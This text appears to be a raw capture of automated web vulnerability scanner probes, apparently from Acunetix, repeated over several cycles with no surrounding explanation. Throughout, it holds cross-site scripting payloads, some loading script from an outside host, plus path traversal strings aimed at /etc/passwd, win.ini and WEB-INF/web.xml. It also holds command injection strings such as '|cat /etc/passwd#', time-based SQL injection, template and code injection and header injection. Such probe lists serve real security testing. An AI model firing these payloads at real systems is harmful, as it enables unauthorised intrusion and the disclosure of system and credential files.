1<ScRiPt%20>prompt(918628)</sCripT>

-1))

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n908579=v973784

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

p75QPQln'

)

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

1

\xf6<img acu onmouseover=prompt(944512) //\xf6>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

LSdElojh')

!(()&&!|*|*|

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1

1<input autofocus onfocus=prompt(902224)>

testasp.vulnweb.com

^(#$!@#$)(()))******

HDqh3hmp'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

<a href='http://www.acunetix.com'>website security</a>

'

1

1

1

-1

/etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

"

1

1

-1)

1_1ZcFU <ScRiPt >prompt(964009)</ScRiPt>

1

1

http://hitTtpTA5ECEV.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

-1))

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

&dir

1yaRiZKX'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

http://www.acunetix.tst

comments

1

xx7K0U1O')

1

1

'"

1

file:///etc/passwd

3DphAD87'))

1'"()&%<ScRiPt >prompt(973309)</ScRiPt>

comments/.

"&dir&"

1

1

<!--

1

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(963863)</ScRiPt>

1

|dir

1

1

1

1

1_917633

WEB-INF/web.xml

1

1

1

'|dir

1

1

1

WEB-INF\web.xml

1

acu6878\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6878

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

acux8667\xc0\xbez1\xc0\xbcz2a\x90bcxuca8667

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(962094)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(984808)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(948114)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905686></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(998177)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(963268)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(912123)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(992613))>

1

1

response.write(9972292*9253320)

1

1<iframe src='data:text/html

1

'+response.write(9972292*9253320)+'

WEB-INF/web.xml

1

1

1<body onload=prompt(948406)>

"+response.write(9972292*9253320)+"

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997157)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(901824)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(937483)>

${99804+99022}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

cat /etc/passwd

1

1

1<ScRiPt%20>prompt(950555)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

-1)

1

1

)

1

1&n948511=v997147

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

-1))

|cat /etc/passwd#

1

1

1

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(994948) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

zJEFtbQt'

'|'ld

1

testasp.vulnweb.com

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(915518)>

/etc/passwd

gIxJuhxl')

'"()

"|"ld

1

1

'

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

qD8aHfBG'))

1

1

1

"

1

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

1

1

'

1

${@print(md5(acunetix_wvs_security_test))}

1

1_4tLiT <ScRiPt >prompt(950171)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

http://hitFRFejvTvko.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

1

acunetix_wvs_invalid_filename

1

1

||cat /etc/passwd

1

1

JihaLwBO'

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

&dir

puFLTQ3j')

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

comments

1

'"

qMd05PY5'))

'&dir&'

1'"()&%<ScRiPt >prompt(957787)</ScRiPt>

1

1

comments/.

1

WEB-INF/web.xml

<!--

1

1

"&dir&"

1

'"()&%<ScRiPt >prompt(909788)</ScRiPt>

1

WEB-INF\web.xml

1

|dir

../../../../../../../../../../windows/win.ini

1

1_999571

1

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

acu3614\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3614

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux6651\xc0\xbez1\xc0\xbcz2a\x90bcxuca6651

1

................windowswin.ini

1

1

1<ScRiPt >prompt(986327)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(984894)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(904966)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?904543></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(930698)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(947928)">

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972108)"></g></svg>

WEB-INF\web.xml

1

1

1

response.write(9474431*9429289)

1<div style=width:expression(prompt(960892))>

1

1

1

&cat /etc/passwd&

'+response.write(9474431*9429289)+'

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

"+response.write(9474431*9429289)+"

1<body onload=prompt(903577)>

1

if(now()=sysdate(),sleep(4.843),0)/*'XOR(if(now()=sysdate(),sleep(4.843),0))OR'"XOR(if(now()=sysdate(),sleep(4.843),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993376)>

1

1

(select(0)from(select(sleep(4.843)))v)/*'+(select(0)from(select(sleep(4.843)))v)+'"+(select(0)from(select(sleep(4.843)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(996232)>

1

1

../../../../../../../../../../etc/passwd.jpg

-1

1

1

`cat /etc/passwd`

1<img/src=">" onerror=alert(971854)>

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

${100245+100461}

1<ScRiPt%20>prompt(907509)</sCripT>

1

'|'ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&n915324=v940939

1&lt

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

VihkbBlt'

)

1

\xf6<img acu onmouseover=prompt(991129) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

jiJXy3cl')

1

!(()&&!|*|*|

'"()

testasp.vulnweb.com

1<input autofocus onfocus=prompt(947927)>

RMjEw7hr'))

/etc/passwd

'

1

1

1

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

1

1

1

1

1_VhVNB <ScRiPt >prompt(942229)</ScRiPt>

&dir

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

http://hitWOk00YPNBo.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

1

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

qVF7opD8'

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

jwriaMsR')

1

file:///etc/passwd

"&dir&"

1

1

1

comments

http://www.acunetix.tst

1

71J8t2US'))

1

|dir

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(938685)</ScRiPt>

1

comments/.

1

1

1

<!--

'|dir

'"()&%<ScRiPt >prompt(962945)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

1

WEB-INF\web.xml

1_984440

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu6109\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6109

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux3795\xc0\xbez1\xc0\xbcz2a\x90bcxuca3795

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(909759)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(929239)</script>

1

1

1

1

1<ScRiPt >prompt(945872)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914541></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(970830)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(981301)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998408)"></g></svg>

1

1<div style=width:expression(prompt(902973))>

1

response.write(9755935*9997407)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'+response.write(9755935*9997407)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(951663)>

"+response.write(9755935*9997407)+"

WEB-INF/web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(915199)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(950567)>

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1

1<img/src=">" onerror=alert(972172)>

`cat /etc/passwd`

1

${100343+99870}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1

1

1<ScRiPt%20>prompt(968954)</sCripT>

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1&lt

1&n905775=v957802

1

)

'|'ld

1some_inexistent_file_with_long_name%00.jpg

\xf6<img acu onmouseover=prompt(949680) //\xf6>

1

ITpu73y4'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'"()

1<input autofocus onfocus=prompt(959478)>

"|"ld

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

nMU2SSCE')

1

<a href='http://www.acunetix.com'>website security</a>

1

1

testasp.vulnweb.com

^(#$!@#$)(()))******

4gHQvsCF'))

/etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

-1

1_O7DDz <ScRiPt >prompt(965264)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

"

acunetix_wvs_invalid_filename

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hit17HcBsrLqM.bxss.me/

||cat /etc/passwd

-1))

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

W4LNFVN7'

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

http://www.acunetix.tst

Wglysr25')

comments/.

1

1

file:///etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(961451)</ScRiPt>

IBhXPvJy'))

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

'"()&%<ScRiPt >prompt(904042)</ScRiPt>

1

1

1

|dir

1

WEB-INF/web.xml

1_971021

1

1

1

1

'|dir

1

WEB-INF\web.xml

1

1

"|dir

acu5609\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5609

1

../../../../../../../../../../windows/win.ini

1

acux5753\xc0\xbez1\xc0\xbcz2a\x90bcxuca5753

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(916871)</ScRiPt>

1

1

1<script>prompt(957268)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(905621)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996375></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(940592)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(922757)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903624)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(953127))>

1

1

response.write(9967214*9748031)

1

1<iframe src='data:text/html

1

1

'+response.write(9967214*9748031)+'

&cat /etc/passwd&

1

WEB-INF/web.xml

1<body onload=prompt(956956)>

1

1

"+response.write(9967214*9748031)+"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

'&cat /etc/passwd&'

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964700)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=xyz OnErRor=prompt(941725)>

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1

1<img/src=">" onerror=alert(912322)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

1

-1)

1

1

1<ScRiPt%20>prompt(946792)</sCripT>

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

-1))

1

1

1&lt

${99189+99219}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

lCZaehLm'

1

\xf6<img acu onmouseover=prompt(979617) //\xf6>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1&n998832=v952589

1some_inexistent_file_with_long_name%00.jpg

1

NlkNDmCJ')

)

1<input autofocus onfocus=prompt(990855)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

2RMyLet4'))

!(()&&!|*|*|

<a href='http://www.acunetix.com'>website security</a>

'"()

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

-1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/etc/passwd

'

1

'

1

-1)

1

1_rlMpH <ScRiPt >prompt(923192)</ScRiPt>

1

1

"

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

1

1

http://hitnKg51NaKeY.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

w0B6a0hA'

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

SjqJCnZX')

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

DVRVHjOZ'))

http://www.acunetix.tst

1

comments

1

'"

1

"&dir&"

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(913046)</ScRiPt>

comments/.

1

<!--

1

1

|dir

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(965081)</ScRiPt>

1

1

1

1

'|dir

1

WEB-INF/web.xml

1_922282

1

1

"|dir

1

1

1

WEB-INF\web.xml

1

acu8018\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8018

1

1

1

1

../../../../../../../../../../windows/win.ini

acux4077\xc0\xbez1\xc0\xbcz2a\x90bcxuca4077

1

1

1

1

1<ScRiPt >prompt(913225)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(933993)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(950837)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936902></ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(941482)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(904433)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997773)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9554799*9065922)

1<div style=width:expression(prompt(996850))>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9554799*9065922)+'

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<body onload=prompt(978802)>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9554799*9065922)+"

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909689)>

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1<img src=xyz OnErRor=prompt(996809)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

WEB-INF\web.xml

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

`cat /etc/passwd`

1<img/src=">" onerror=alert(994691)>

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

|cat /etc/passwd#

1<ScRiPt%20>prompt(928883)</sCripT>

1

${99796+100378}

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

)

1&n910064=v928546

1

"|"ld

\xf6<img acu onmouseover=prompt(939543) //\xf6>

1

QWIpwB0P'

1some_inexistent_file_with_long_name%00.jpg

/etc/passwd

!(()&&!|*|*|

1

1

1<input autofocus onfocus=prompt(998226)>

VfdXLiVq')

1

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

Vn0IsjEB'))

1

'

'

testasp.vulnweb.com

1

1

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

1

1

"

"

1_mcqXA <ScRiPt >prompt(955436)</ScRiPt>

1

1

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

file:///etc/passwd

-1))

acunetix_wvs_invalid_filename

1

http://hittffWqIZ44N.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

HacXuX5Z'

/\../\../\../\../\../\../\../etc/passwd

&dir

comments

1

1

1

1

1

1

m4dtY2ZQ')

WEB-INF/web.xml

http://www.acunetix.tst

comments

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'"

1

C8Cf7gct'))

WEB-INF\web.xml

comments/.

1

"&dir&"

1

1'"()&%<ScRiPt >prompt(943783)</ScRiPt>

1

<!--

1

1

1

../../../../../../../../../../windows/win.ini

|dir

1

'"()&%<ScRiPt >prompt(942978)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../boot.ini

'|dir

1_997547

1

../../../../../../../../../../windows/win.ini.jpg

1

1

"|dir

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu10817\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10817

1

................windowswin.ini

1

1

acux3213\xc0\xbez1\xc0\xbcz2a\x90bcxuca3213

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(954520)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(993545)</script>

1

1

1

1

1<ScRiPt >prompt(967250)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971850></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(936732)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(942219)">

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(982689)"></g></svg>

1

1

WEB-INF\web.xml

response.write(9352911*9825626)

1

1

1<div style=width:expression(prompt(937691))>

1

1

'+response.write(9352911*9825626)+'

1

1

1<iframe src='data:text/html

1

1

"+response.write(9352911*9825626)+"

1

&cat /etc/passwd&

1<body onload=prompt(960377)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903728)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=xyz OnErRor=prompt(990782)>

